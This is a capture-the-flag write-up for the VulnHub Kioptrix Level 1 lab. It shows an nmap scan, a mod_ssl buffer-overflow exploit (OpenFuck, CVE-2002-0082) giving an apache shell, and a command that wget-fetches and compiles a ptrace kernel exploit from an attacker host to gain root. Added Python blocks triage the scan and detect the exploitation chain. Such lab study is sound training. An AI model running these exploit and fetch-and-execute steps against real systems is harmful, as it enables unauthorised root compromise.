VulnHub Kioptrix : Level 1
6 March, 2021
Machine: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
I began with an nmap scan, which showed HTTP on port 80, SMB on port 139 and HTTPS on port 443.
kali@kali> sudo nmap -A 192.168.56.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 23:45 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2021-03-03T15:16:31+00:00; +10h29m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:12:B0:6B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 10h29m58s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 1.80 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.87 seconds
I tried Nikto for the first time and it showed that the version of mod_ssl being used was vulnerable to a remote buffer overflow. Searching for it, it was pretty simple to find: CVE-2002-0082.
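Added example, not code from the original post: a small Python triage pass over the scan output above that flags the legacy indicators a defender would act on (SSHv1, SSLv2 and export-grade ciphers, the expired certificate, TRACE, and a mod_ssl version below the 2.8.7 release that fixed CVE-2002-0082; the 2.8.7 threshold comes from the advisory, not from this page). The sample scan text is copied from the nmap output above.

```python
import re
from datetime import datetime

# Constructed sample: the lines of the nmap output above that carry the findings.
SCAN = """\
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
|_ Potentially risky methods: TRACE
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_Not valid after: 2010-09-26T09:32:06
| SSLv2 supported
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
"""

# mod_ssl fixed the CVE-2002-0082 session-cache overflow in 2.8.7 (advisory
# threshold, an assumption not stated on the page).
MOD_SSL_FIXED = (2, 8, 7)

def version_tuple(text):
    # '2.8.4' -> (2, 8, 4); non-numeric suffixes are ignored
    return tuple(int(x) for x in re.findall(r"\d+", text))

def triage(scan, scan_date):
    # Return the sorted list of legacy/risky indicators found in the scan text.
    findings = set()
    for line in scan.splitlines():
        if "Server supports SSHv1" in line:
            findings.add("sshv1")
        if "SSLv2 supported" in line:
            findings.add("sslv2")
        if re.search(r"\bSSL2_\S*EXPORT", line):
            findings.add("export-cipher")
        if "Potentially risky methods: TRACE" in line:
            findings.add("http-trace")
        m = re.search(r"Not valid after: (\S+)", line)
        if m and datetime.fromisoformat(m.group(1)) < scan_date:
            findings.add("cert-expired")
        m = re.search(r"mod_ssl/([\d.]+)", line)
        if m and version_tuple(m.group(1)) < MOD_SSL_FIXED:
            findings.add("CVE-2002-0082")  # the CVE Nikto reported above
    return sorted(findings)

def triage_page_scan():
    # Run the triage against the sample using the scan date from the page.
    return triage(SCAN, datetime(2021, 3, 2))
```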
kali@kali> ./764 0x6b 192.168.56.101
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--14:17:23-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ ls
ls
bash-2.05$ whoami
whoami
apache
bash-2.05$
Initially I was using the exploit incorrectly: I modified the second command to a netcat-based reverse shell, which didn't work at all. So I revisited the original code and realised that ptrace-kmod.c is another kernel exploit altogether, one that would escalate the shell to root. So after compiling the original exploit I was able to get root.
kali@kali> ./764 0x6b 192.168.56.101
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 2.168.56.103:8000/ptrace-kmod.
--14:30:50-- http://192.168.56.103:8000/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.103:8000... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,737 [text/x-csrc]

0K ... 100% @ 214.67 KB/s

14:30:50 (214.67 KB/s) - `ptrace-kmod.c' saved [3737/3737]

[+] Attached to 1657
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
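Added example, not from the original post: detection logic for the post-exploitation chain the session above shows (apache-owned httpd spawning bash, the web service account fetching and compiling ptrace-kmod.c, then a root shell descended from that account), run over constructed process-execution events. The event fields (pid, ppid, user, comm, argv) and the pids are assumptions, not a real sensor's schema.

```python
# Accounts a web server normally runs as, and tools it has no business running.
WEB_ACCOUNTS = {"apache", "www-data", "httpd"}
STAGING_TOOLS = {"wget", "curl", "gcc", "cc", "make"}
SHELLS = {"bash", "sh"}

# Constructed events modelled on the session above; pids are made up
# (1657 echoes the pid the exploit reported attaching to).
EVENTS = [
    {"pid": 1650, "ppid": 1, "user": "root", "comm": "httpd", "argv": "httpd -DSSL"},
    {"pid": 1657, "ppid": 1650, "user": "apache", "comm": "httpd", "argv": "httpd -DSSL"},
    {"pid": 1701, "ppid": 1657, "user": "apache", "comm": "bash", "argv": "bash -i"},
    {"pid": 1702, "ppid": 1701, "user": "apache", "comm": "wget",
     "argv": "wget http://192.168.56.103:8000/ptrace-kmod.c"},
    {"pid": 1703, "ppid": 1701, "user": "apache", "comm": "gcc", "argv": "gcc -o p ptrace-kmod.c"},
    {"pid": 1704, "ppid": 1701, "user": "apache", "comm": "p", "argv": "./p"},
    {"pid": 1705, "ppid": 1704, "user": "root", "comm": "sh", "argv": "/bin/sh"},
    {"pid": 1800, "ppid": 1, "user": "root", "comm": "crond", "argv": "crond"},
]

def ancestors(events, pid):
    # Events for the parent chain of pid (nearest first), excluding pid itself.
    by_pid = {e["pid"]: e for e in events}
    chain = []
    pid = by_pid[pid]["ppid"]
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def detect(events):
    # Return (pid, rule) alerts for the three stages of the chain.
    alerts = []
    for e in events:
        parents = ancestors(events, e["pid"])
        # 1. the web server process itself spawning a shell
        if e["comm"] in SHELLS and parents and parents[0]["comm"] == "httpd":
            alerts.append((e["pid"], "httpd-spawned-shell"))
        # 2. the web service account fetching or compiling code on the host
        if e["user"] in WEB_ACCOUNTS and e["comm"] in STAGING_TOOLS:
            alerts.append((e["pid"], "web-account-staging-tool"))
        # 3. a root process whose lineage passes through the web service account
        if e["user"] == "root" and any(p["user"] in WEB_ACCOUNTS for p in parents):
            alerts.append((e["pid"], "root-under-web-account"))
    return alerts
```

Rule 3 is the one that catches the ptrace-kmod step regardless of which local exploit was used, since it keys on the privilege jump rather than on a file name.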
There is another method that requires exploiting SMB using MSF, which I didn't try since the exploit is part of MSF.